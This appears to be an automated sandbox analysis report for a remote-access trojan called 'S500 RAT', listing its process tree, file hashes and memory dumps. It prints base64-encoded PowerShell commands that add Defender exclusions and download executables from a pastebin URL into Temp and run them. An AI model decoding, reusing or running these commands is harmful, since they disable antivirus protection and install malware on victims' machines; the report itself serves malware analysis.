"C:\Users\Admin\Desktop\S500 RAT\S500RAT.exe"
1⤵
- Drops file in Windows directory
- Suspicious use of SetWindowsHookEx
PID:1992

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAZQB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGUAegB0ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHIAYgB4ACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHoAdwBiACMAPgA="
2⤵
- Command and Scripting Interpreter: PowerShell
PID:2132

C:\Users\Admin\w00ieq6n.exe
"C:\Users\Admin\w00ieq6n.exe"
2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
PID:3088

C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
PID:2016

C:\Windows\system32\relog.exe
C:\Windows\system32\relog.exe
4⤵
PID:3716

C:\Windows\S500RAT.exe
"C:\Windows\S500RAT.exe"
2⤵
- Checks computer location settings
- Executes dropped EXE
PID:3232

C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
"C:\Users\Admin\AppData\Local\Temp\S500RAT.exe"
3⤵
- Checks computer location settings
- Executes dropped EXE
PID:5092

C:\Users\Admin\AppData\Local\Temp\blackCC.exe
"C:\Users\Admin\AppData\Local\Temp\blackCC.exe"
4⤵
- Checks computer location settings
- Executes dropped EXE
PID:3892

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAeAB3ACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAByAHQAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdQByAG4AIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAdQBxAHAAIwA+ADsAJAB3AGMAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkAOwAkAGwAbgBrACAAPQAgACQAdwBjAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AcABhAHMAdABlAGIAaQBuAC4AYwBvAG0ALwByAGEAdwAvAHAAMgBzADcAdABEAFMAZAAnACkALgBTAHAAbABpAHQAKABbAHMAdAByAGkAbgBnAFsAXQBdACIAYAByAGAAbgAiACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AE4AbwBuAGUAKQA7ACAAJABmAG4AIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAUgBhAG4AZABvAG0ARgBpAGwAZQBOAGEAbQBlACgAKQA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAJAB3AGMALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACQAbABuAGsAWwAkAGkAXQAsACAAPAAjAGgAeABhACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAbQB3AGMAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBhAHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACgAJABmAG4AIAArACAAJABpAC4AVABvAFMAdAByAGkAbgBnACgAKQAgACsAIAAnAC4AZQB4AGUAJwApACkAKQAgAH0APAAjAGIAegBzACMAPgA7ACAAZgBvAHIAIAAoACQAaQA9ADAAOwAgACQAaQAgAC0AbAB0ACAAJABsAG4AawAuAEwAZQBuAGcAdABoADsAIAAkAGkAKwArACkAIAB7ACAAUwB0AGEAcgB0AC0AUAByAG8AYwBlAHMAcwAgAC0ARgBpAGwAZQBQAGEAdABoACAAPAAjAHAAdQB3ACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBkAGoAeQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAKAAkAGYAbgAgACsAIAAkAGkALgBUAG8AUwB0AHIAaQBuAGcAKAApACAAKwAgACcALgBlAHgAZQAnACkAKQAgAH0AIAA8ACMAcgBtAHIAIwA+AA=="
5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
PID:4964

C:\Users\Admin\AppData\Local\Temp\Client.exe
"C:\Users\Admin\AppData\Local\Temp\Client.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2736

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
4⤵
PID:1096

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1096 -s 444
5⤵
- Program crash
PID:4492

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 200
4⤵
- Program crash
PID:1064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 2736 -ip 2736
1⤵
PID:4288

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 1096 -ip 1096
1⤵
PID:2948

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000028
Filesize
17KB

MD5
950eca48e414acbe2c3b5d046dcb8521

SHA1
1731f264e979f18cdf08c405c7b7d32789a6fb59

SHA256
c0bbe530abfce19e06697bc4358eb426e076ccdb9113e22df4a6f32085da67a2

SHA512
27e55525ade4d099a6881011f6e2e0d5d3a9ca7181f4f014dc231d40b3b1907d0d437b0c44d336c25dd7b73209cd773b8563675ac260c43c7752e2d2d694d4d9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
Filesize
72B

MD5
da746f20ffb2c8a7b71f279cc6d60ae2

SHA1
4d8febb81a9da2171a45970845bb97ebc87066aa

SHA256
12f3cc79291f24a0bb0d6cf1344391df701f7745dcb0239f98ce8a2df1b90262

SHA512
8aca34aba2590081bd1ff87ded7cb80f9b8ac8e326c8f66a3a262bfe58a7e990b6b1e41045f163f22924a0e24d3434309ca4678d51c22aa2a7570f2964a5eb92

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\File System\000\p\Paths\MANIFEST-000001
Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History
Filesize
152KB

MD5
69e6c3abfd25f7bc626de912ead058e4

SHA1
4ddfc1b32913c3e1886bc45f0fbae41cb3bfc309

SHA256
f2477da22bf77aaf30bd4e9d55505bcf084772296fd0e95558de27acefd58b04

SHA512
79eeca01c4b30a0d8bc271f6f869c97a7e03c30cb09058c3d302c147efe78076b61c42829b833c8a76591a35938b202198a07109a2edfe06460e5554f88ae8c9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\https_mega.nz_0.indexeddb.leveldb\CURRENT
Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Filesize
20KB

MD5
ade04175772a760cd3e75414ea5b0a84

SHA1
67603cf18ebf2d1f68305241d2360a5206f7ac46

SHA256
c58b8e68ee67f761e7c5cf4d9f585c7142758ec0db1e86be91cc595acbf8bb07

SHA512
dfc92fe74788c0acb863c1051dc58af358245e98186c31ed7d944f29ad6c68a197a73ce529f633eebde93e7389a18892ee593d746d87574603697d55bfe74d12

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
Filesize
2KB

MD5
b83e408249a3fad7c6bbb679299f72aa

SHA1
18c19569de01c938560ed25da1db1bba5c765bf5

SHA256
29f298300392f3d3703447eecf3c5b187385a8f4d36a847c62c9fd29e2dc5c3f

SHA512
5092f1f0a9d69955dbe1092b64ba8bc0503cced0f034c53a80c4f65723f13cc13b587159d14f0853a85ba86898c496fc3e88e0ed543716e7bd6755bb19a3f42c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
Filesize
523B

MD5
a194447ef2615f78f9b906dee27d40e6

SHA1
234daa69b6db8abf01a8e106ff5331e9ccc8d11b

SHA256
9712694d99550641b33932201fcd4e8999c938f925bc29f47644aeabeb08e06b

SHA512
d315043f37de573de3df51feabca48f26e9170dcaece6a9c7cc246a705142f1fa3075e9d6b23c9f8a4be1552dcd6c46c3f837608d7463b3ccdeee5ec3b0007cc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
7KB

MD5
f6327a8efe5826c8d72f4dd16af12305

SHA1
442fa94d079e281b926bc207ac23f9dd76d39676

SHA256
e787d5f9b52669fdab65b0c1bc211821e4dc03777448c203f9e58cf5a525fc72

SHA512
18fd9ff063be7a2e2b04d32337a8cf8eab7c2cbb8e412995b045d82a8ce2b915a7e4e385be34397a604a559fca1d696afead5997fadff5fad43c600fb4bb15fc

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
7KB

MD5
bde795fb3f1c0962dd120fea5e764ac1

SHA1
12aee051de7bd650f7b03d0ed87e1fb8a2c573f4

SHA256
0a082d5c3f1b927549ccdd1cdced23ac753431e56598dd748b4dd0164f31a367

SHA512
6e4e9842e467e5a40a867e06844636e4bec08a25670093ebc3045c4024bb9f56a3fd359330b35f641ebed71786cba8f61f9e7fca498428878978fe9d4425be6e

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index
Filesize
96B

MD5
827a641f998e96bbc5a357381dd7ee93

SHA1
56e27ffbccbf0f0b547a0edd87b2718fb2192949

SHA256
e11a034d63ee4a04433969f99391e5dafc288d940c0c5a47260569534ffcc9f6

SHA512
07ef31db7d94ff1b06d3fbbc08a317d48919feb02b5abb40d88827ae7bcbd33a5194179757c08854bbc8805c253c917b007436471f89d8c372e86f088be0bc17

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
Filesize
138KB

MD5
de46b3182278df2181bcc3c6751c74e6

SHA1
7a6f07a3761bf3022cfe77e6c0511988ee00b30f

SHA256
d1a5459c7c8dc1b52d712f1eaa10f3494eee8e19e3ee68050c32f47367530e5c

SHA512
5f1452f13cfee224c6fda2166f958afecb1860f378cc7b4d0dd86fbe5925a71d9cb8cd33fc1b177da600dcc86075ea0d4e66f758b3aa78b5c143925197bbdea0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
Filesize
97KB

MD5
5adc7d9b3484e839a1aedad4cbd0faa8

SHA1
4b048f5968c8665d2c85e6febed56f096bf6ff52

SHA256
3a328613e97f25dae64cbce588a2fc8a60f9ffc62d8fdfd1cf09debcab3f98c8

SHA512
6c28ebde2865418c9fd9f5f7bd17d9e13e8c642297bac2ed617252c6082598dd7bf79bf691b0954a0ba05a6ca7a9fb6a3a91faa224e2d42bc023146ca9d0e0c2

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache~RFe585b69.TMP
Filesize
88KB

MD5
e77d6541e0f222a3bfeba41f77b15a31

SHA1
0ff6ec663dc31207a858d25162dbc9062343a21b

SHA256
3601eb09ead4cb84ba2a1f8d339cae8487bd85e0a366b209b1be936c84c7e15a

SHA512
98210b1dead8a07413fc9998a3089321d06e6cd1f65d2b3db946b95592889263afae807b24f48eef378d381937a06b8f2fc55f1a28821df7a3febabfafeb38fe

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
97c56880acbd1f62502a45e12b6270cc

SHA1
6f95fe207bc85683fd9bad51f596ee86d32dca0b

SHA256
0af4e6a4e588ccd3defbdf9fbf113671152abf509778a1a4eea477efc2aad31b

SHA512
66b7340e6ebb89f3ada0944d95cb52204f8cfd064f244836fd990e8b981a4e908a611b26822fd1b8e4cf1945712e27803c3da8857401533dc7024f69cc5b1101

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
236ab0b52dd5e504599035d97f742c82

SHA1
2fb8b4832b6af847cab5d0750611f00327611c73

SHA256
4776615ead3f05d21bfd9b86a06434fe4803bb497e4ca2b477aedfc71c208c9e

SHA512
9cd567e9ec06da4c8ab7c208b089e9aa1b95e25c37d68b7c82cf6399acfcf940322e113777d5e18cd911a2bcd306f290a41ce375c0ff0a48c6ed69b5d482ec02

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
19KB

MD5
fbdb89edf78843d668f1c42ee8a339e0

SHA1
02dd5c7d303855b21e013efab622448aeca3e449

SHA256
ec7bd37e7bdaf7d16262a99640ebb830b468ba7496e70be0a27dbcb87a35032f

SHA512
0baff7c5820a5cd5641fc656c58edcec727a6cd4efa1900860cb129ee437604527d1fc132e5dd365112f43a85c841d4e595b8490cdf7bd15135380db5c827169

Download Submit
C:\Users\Admin\AppData\Local\Temp\Client.exe
Filesize
672KB

MD5
dbf35eac1c87ed287c8f7cba33d133b5

SHA1
d1dbfba561f8112e5099507a18cd9465b4fcb577

SHA256
16094ff7a11c1960da481a9e106676fd94902e64c5625549493dca97bde72fcd

SHA512
c4b2112773036d89ffb1faa44ce00e1ae5bb586c7bfc3219549f32adaf74e545687ebe4682db789cf4600dcbc38d0545dfec171d92d15244cb7234736ec5b532

Download Submit
C:\Users\Admin\AppData\Local\Temp\S500RAT.exe
Filesize
17.8MB

MD5
e5f9792d0889af4fb6c295c5e0d74cee

SHA1
1aabebd0923a3e4e1772b48294c7b0fc86973e71

SHA256
c5f99ca677d1b5aade06ab17adfa2a5c064c89e2f52875aefbca071ae2189f7f

SHA512
4290a88de6fb0e6f851beff8577467760d1fa6afeda0d8a0afd50f6f7ad77d3960c0742260bdc87154c828a67f5807680dc8093386bbcd0ab97ccf8091b1b288

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_fmp342bo.e1z.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\blackCC.exe
Filesize
72KB

MD5
462b459a2560b65a657cfecce53d682a

SHA1
f0ce24faf42d2d1453c4f18fda0223b83486e5ae

SHA256
00502647989c700d1cbf37685fcdf3a81d9302fb792edabecb5a211c5cdff0db

SHA512
5d88eb5c91dd772d0c6f54e5d799639e1fd59d4dcf112674d065b76bb3ab048442cccc13f2f031f611b9632a223c961c7ad43f09a06b33d2f92adec7da9ff88b

Download Submit
C:\Users\Admin\AppData\Local\Temp\screen.jpg
Filesize
146KB

MD5
aef5c4ee30d92f26ce79b874ff3a5461

SHA1
2937a840d49a9dac7d49338c8764be52c546760b

SHA256
a6d993d840e3e362a01bf6dc80ee69ac69ed188889b1693e728be91b14aacccc

SHA512
b49d5ca177c68e727027b6a1096d3b6e2fd44400b26d0547312ca1f3c1fa847a9f5e49b9e53636c5f6ac48798eee26843c6ab8082e9be6b3a23f526ccf233a54

Download Submit
C:\Users\Admin\AppData\Local\Temp\screen.jpg
Filesize
123KB

MD5
dcf7657f584b7a6d26af60408a06e88f

SHA1
781772f6e32d7184100ba4e201265c7fe691430e

SHA256
4c323d3ce7169168984454edc07feaf6ed1fb67bd259c862e9701392cb46cec6

SHA512
e98764d46c11cf3fbcd75e12578dd8b39822c280b4a38fc9487db6e0e0144b90083dc5217d6436f37adf2fc4260e4bd660e37fb9c00d0b3d5f118380189da845

Download Submit
C:\Users\Admin\AppData\Local\Temp\screen.jpg
Filesize
129KB

MD5
67147f5bc789412ed8936a0651c3f54d

SHA1
4841ccd039bd49d89461d320a2e4374b4eca2b20

SHA256
2b9eb9a648c6b2fcc0e66912be0b0bdd51d46f1764a985d07b968821be8d8d14

SHA512
cb2dd2b4d92ab548cd02da3c341517812190f5081d709bbfaf0d9cffad47f59cc8670389221db743558a52f25d2bd2634ab776c000d42aeca10a6e3d438825b4

Download Submit
C:\Users\Admin\Downloads\S500 RAT.zip
Filesize
43.3MB

MD5
345a37c6bcd0ce82aa0eb4b339a99ecc

SHA1
3056b6855d0f359485c037de1673786f000c78c9

SHA256
eb5e0956e26576d0c02cd7749476a564bd8671375ccca863efaa7347235fdb7d

SHA512
1741db005d19d23cdfba33952eb4d44d460ab540ef4151b4ffd17a8c72c37a729d0d01e94985a5f295b92865d90037c03d09bb65cedb80423cfe4cc4de319239

Download Submit
C:\Users\Admin\w00ieq6n.exe
Filesize
657KB

MD5
93eb0cf0043f1f507a1b94eea7b65fe4

SHA1
148be925922c60190bde523cb60a50da9e544da1

SHA256
6cbd8961b21b75bb176439538633191ed8364e755c8b2d049ca7281871430d30

SHA512
94640f8dfd1ceeb8ec72be3bd40bbafb8b4b8dda584dffcd88c6c616cd65ffb9b0087ed093231db3940211a3b5c3fc8efed957c4e8a701b0a61dfe1c943ccf58

Download Submit
C:\Windows\S500RAT.exe
Filesize
19.0MB

MD5
73f84c857e0811622501856e9dd3ec72

SHA1
0ad76a2721a0f3d032fccaf6f3310005b6f968ea

SHA256
acd11511324d5d76e3d7a9e786b62a6d25dc0240d57e9fd64228fa7e3409a4af

SHA512
683fe78c846c3647838fb5c91392c8889dc1332795ccae07733cb8d9b69f9abc452ba2b84312a38e6cf08918ee72b320855c224499ae1f1f6bb3c8a98398ba20

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
19c4275f01a27aeb7d82202a0e3f182c

SHA1
484ab36f879ea4e3184dcf2ae851f70be0716575

SHA256
5497700add7d384a03f36185a3f71872f1449ae16a9c29de3dfa0314fac303af

SHA512
f1f591649b445c3142fb9ce59c37a2b95e15696ed4958c97ba523b34f6568c282c557ed1d6227a794b831cc466eca6b7a02db021f610b6da880ec650a2a7b5df

Download Submit
\??\pipe\crashpad_1504_ZNCCCZBKUMPZSRXD
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
memory/116-254-0x0000000002E10000-0x0000000003210000-memory.dmp

Filesize
4.0MB

Download
memory/116-257-0x0000000002E10000-0x0000000003210000-memory.dmp

Filesize
4.0MB

Download
memory/116-252-0x0000000000400000-0x0000000000473000-memory.dmp

Filesize
460KB

Download
memory/116-249-0x0000000000400000-0x0000000000473000-memory.dmp

Filesize
460KB

Download
memory/116-253-0x0000000001180000-0x0000000001187000-memory.dmp

Filesize
28KB

Download
memory/116-251-0x0000000000400000-0x0000000000473000-memory.dmp

Filesize
460KB

Download
memory/116-256-0x0000000002E10000-0x0000000003210000-memory.dmp

Filesize
4.0MB

Download
memory/116-259-0x0000000002E10000-0x0000000003210000-memory.dmp

Filesize
4.0MB

Download
memory/116-258-0x0000000000400000-0x0000000000473000-memory.dmp

Filesize
460KB

Download
memory/468-459-0x0000000006520000-0x000000000656C000-memory.dmp

Filesize
304KB

Download
memory/468-511-0x0000000007A70000-0x0000000007A84000-memory.dmp

Filesize
80KB

Download
memory/468-501-0x0000000007A40000-0x0000000007A51000-memory.dmp

Filesize
68KB

Download
memory/468-488-0x00000000744F0000-0x000000007453C000-memory.dmp

Filesize
304KB

Download
memory/468-499-0x0000000007720000-0x00000000077C3000-memory.dmp

Filesize
652KB

Download
memory/468-456-0x0000000006090000-0x00000000063E4000-memory.dmp

Filesize
3.3MB

Download
memory/1164-278-0x0000000140000000-0x0000000140174000-memory.dmp

Filesize
1.5MB

Download
memory/1164-280-0x0000000140000000-0x0000000140174000-memory.dmp

Filesize
1.5MB

Download
memory/1492-341-0x0000000000400000-0x00000000015D4000-memory.dmp

Filesize
17.8MB

Download
memory/1512-375-0x0000000000400000-0x0000000000473000-memory.dmp

Filesize
460KB

Download
memory/1512-412-0x0000000002ED0000-0x00000000032D0000-memory.dmp

Filesize
4.0MB

Download
memory/1956-330-0x0000000000400000-0x00000000016FC000-memory.dmp

Filesize
19.0MB

Download
memory/2008-597-0x0000000000400000-0x00000000016FC000-memory.dmp

Filesize
19.0MB

Download
memory/2016-558-0x0000000140000000-0x0000000140174000-memory.dmp

Filesize
1.5MB

Download
memory/2132-758-0x00000000075E0000-0x00000000075F1000-memory.dmp

Filesize
68KB

Download
memory/2132-702-0x0000000005A20000-0x0000000005D74000-memory.dmp

Filesize
3.3MB

Download
memory/2132-740-0x0000000007080000-0x0000000007123000-memory.dmp

Filesize
652KB

Download
memory/2132-730-0x0000000074B10000-0x0000000074B5C000-memory.dmp

Filesize
304KB

Download
memory/2132-717-0x00000000060D0000-0x000000000611C000-memory.dmp

Filesize
304KB

Download
memory/2132-762-0x0000000007610000-0x0000000007624000-memory.dmp

Filesize
80KB

Download
memory/2204-638-0x000000006FFC0000-0x000000007000C000-memory.dmp

Filesize
304KB

Download
memory/2204-648-0x00000000070F0000-0x0000000007193000-memory.dmp

Filesize
652KB

Download
memory/2364-477-0x0000000000400000-0x00000000016FC000-memory.dmp

Filesize
19.0MB

Download
memory/2428-436-0x0000000140000000-0x0000000140174000-memory.dmp

Filesize
1.5MB

Download
memory/2480-654-0x0000000002870000-0x0000000002C70000-memory.dmp

Filesize
4.0MB

Download
memory/2480-634-0x0000000000400000-0x0000000000473000-memory.dmp

Filesize
460KB

Download
memory/2884-533-0x0000000002F60000-0x0000000003360000-memory.dmp

Filesize
4.0MB

Download
memory/2884-513-0x0000000000400000-0x0000000000473000-memory.dmp

Filesize
460KB

Download
memory/3088-690-0x0000000140000000-0x0000000140174000-memory.dmp

Filesize
1.5MB

Download
memory/3088-693-0x0000000140000000-0x0000000140174000-memory.dmp

Filesize
1.5MB

Download
memory/3308-500-0x0000000000400000-0x00000000015D4000-memory.dmp

Filesize
17.8MB

Download
memory/3440-443-0x0000000140000000-0x0000000140174000-memory.dmp

Filesize
1.5MB

Download
memory/3440-541-0x0000000140000000-0x0000000140174000-memory.dmp

Filesize
1.5MB

Download
memory/3472-609-0x0000000000400000-0x00000000015D4000-memory.dmp

Filesize
17.8MB

Download
memory/3972-573-0x00000000059B0000-0x0000000005D04000-memory.dmp

Filesize
3.3MB

Download
memory/3972-586-0x0000000006190000-0x00000000061DC000-memory.dmp

Filesize
304KB

Download
memory/3972-610-0x000000006FFC0000-0x000000007000C000-memory.dmp

Filesize
304KB

Download
memory/3972-620-0x0000000007130000-0x00000000071D3000-memory.dmp

Filesize
652KB

Download
memory/3972-622-0x0000000007680000-0x0000000007691000-memory.dmp

Filesize
68KB

Download
memory/3972-632-0x00000000076B0000-0x00000000076C4000-memory.dmp

Filesize
80KB

Download
memory/4028-517-0x00000000744F0000-0x000000007453C000-memory.dmp

Filesize
304KB

Download
memory/4028-527-0x0000000007400000-0x00000000074A3000-memory.dmp

Filesize
652KB

Download
memory/4064-544-0x0000000002BE0000-0x0000000002FE0000-memory.dmp

Filesize
4.0MB

Download
memory/4364-413-0x0000000140000000-0x0000000140174000-memory.dmp

Filesize
1.5MB

Download
memory/4444-389-0x000001DDFAF90000-0x000001DDFAF91000-memory.dmp

Filesize
4KB

Download
memory/4444-388-0x000001DDFAF90000-0x000001DDFAF91000-memory.dmp

Filesize
4KB

Download
memory/4444-379-0x000001DDFAF90000-0x000001DDFAF91000-memory.dmp

Filesize
4KB

Download
memory/4444-378-0x000001DDFAF90000-0x000001DDFAF91000-memory.dmp

Filesize
4KB

Download
memory/4444-377-0x000001DDFAF90000-0x000001DDFAF91000-memory.dmp

Filesize
4KB

Download
memory/4444-384-0x000001DDFAF90000-0x000001DDFAF91000-memory.dmp

Filesize
4KB

Download
memory/4444-385-0x000001DDFAF90000-0x000001DDFAF91000-memory.dmp

Filesize
4KB

Download
memory/4444-386-0x000001DDFAF90000-0x000001DDFAF91000-memory.dmp

Filesize
4KB

Download
memory/4444-390-0x000001DDFAF90000-0x000001DDFAF91000-memory.dmp

Filesize
4KB

Download
memory/4444-387-0x000001DDFAF90000-0x000001DDFAF91000-memory.dmp

Filesize
4KB

Download
memory/4480-365-0x0000000007650000-0x0000000007CCA000-memory.dmp

Filesize
6.5MB

Download
memory/4480-364-0x0000000006ED0000-0x0000000006F73000-memory.dmp

Filesize
652KB

Download
memory/4480-391-0x0000000007350000-0x000000000736A000-memory.dmp

Filesize
104KB

Download
memory/4480-380-0x0000000007260000-0x0000000007274000-memory.dmp

Filesize
80KB

Download
memory/4480-392-0x0000000007330000-0x0000000007338000-memory.dmp

Filesize
32KB

Download
memory/4480-291-0x00000000026A0000-0x00000000026D6000-memory.dmp

Filesize
216KB

Download
memory/4480-292-0x0000000004DF0000-0x0000000005418000-memory.dmp

Filesize
6.2MB

Download
memory/4480-376-0x0000000007250000-0x000000000725E000-memory.dmp

Filesize
56KB

Download
memory/4480-372-0x0000000007210000-0x0000000007221000-memory.dmp

Filesize
68KB

Download
memory/4480-371-0x0000000007290000-0x0000000007326000-memory.dmp

Filesize
600KB

Download
memory/4480-367-0x0000000007090000-0x000000000709A000-memory.dmp

Filesize
40KB

Download
memory/4480-297-0x0000000005590000-0x00000000055F6000-memory.dmp

Filesize
408KB

Download
memory/4480-366-0x0000000007010000-0x000000000702A000-memory.dmp

Filesize
104KB

Download
memory/4480-343-0x0000000006E90000-0x0000000006EC2000-memory.dmp

Filesize
200KB

Download
memory/4480-344-0x00000000704F0000-0x000000007053C000-memory.dmp

Filesize
304KB

Download
memory/4480-296-0x0000000004CA0000-0x0000000004CC2000-memory.dmp

Filesize
136KB

Download
memory/4480-298-0x0000000005600000-0x0000000005666000-memory.dmp

Filesize
408KB

Download
memory/4480-362-0x0000000006290000-0x00000000062AE000-memory.dmp

Filesize
120KB

Download
memory/4480-311-0x0000000005CE0000-0x0000000005CFE000-memory.dmp

Filesize
120KB

Download
memory/4480-313-0x0000000005D00000-0x0000000005D4C000-memory.dmp

Filesize
304KB

Download
memory/4480-301-0x0000000005670000-0x00000000059C4000-memory.dmp

Filesize
3.3MB

Download
memory/4936-656-0x0000000140000000-0x0000000140174000-memory.dmp

Filesize
1.5MB

Download
memory/4964-774-0x00000000059C0000-0x0000000005D14000-memory.dmp

Filesize
3.3MB

Download
memory/4964-775-0x0000000005FF0000-0x000000000603C000-memory.dmp

Filesize
304KB

